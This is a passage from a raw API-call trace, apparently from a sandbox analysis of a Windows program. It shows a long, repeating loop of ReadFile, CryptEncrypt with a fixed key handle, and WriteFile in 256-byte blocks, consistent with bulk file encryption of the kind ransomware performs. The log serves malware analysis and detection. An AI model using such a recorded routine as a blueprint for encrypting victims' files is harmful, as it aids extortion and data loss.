lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.443] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.443] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.444] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.444] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.444] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.444] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.444] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.444] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.444] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.444] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.444] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.444] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.444] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.444] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.444] GetLastError () returned 0x0 [0153.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.445] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.445] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.445] GetLastError () returned 0x0 [0153.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.445] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.445] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.445] GetLastError () returned 0x0 [0153.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.445] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.445] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.445] GetLastError () returned 0x0 [0153.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.445] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.445] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.445] GetLastError () returned 0x0 [0153.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.445] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.445] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.445] GetLastError () returned 0x0 [0153.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.445] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.445] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.446] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.446] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.446] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.446] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.446] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.446] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.446] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.446] GetLastError () returned 0x0 [0153.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.447] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.447] GetLastError () returned 0x0 [0153.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.447] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.447] GetLastError () returned 0x0 [0153.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.447] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.447] GetLastError () returned 0x0 [0153.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.447] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.447] GetLastError () returned 0x0 [0153.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.447] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.447] GetLastError () returned 0x0 [0153.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.447] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.447] GetLastError () returned 0x0 [0153.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.447] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.448] GetLastError () returned 0x0 [0153.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.448] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.448] GetLastError () returned 0x0 [0153.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.448] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.448] GetLastError () returned 0x0 [0153.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.448] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.448] GetLastError () returned 0x0 [0153.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.448] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.448] GetLastError () returned 0x0 [0153.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.448] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.448] GetLastError () returned 0x0 [0153.448] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.448] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.448] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.449] GetLastError () returned 0x0 [0153.449] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.449] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, 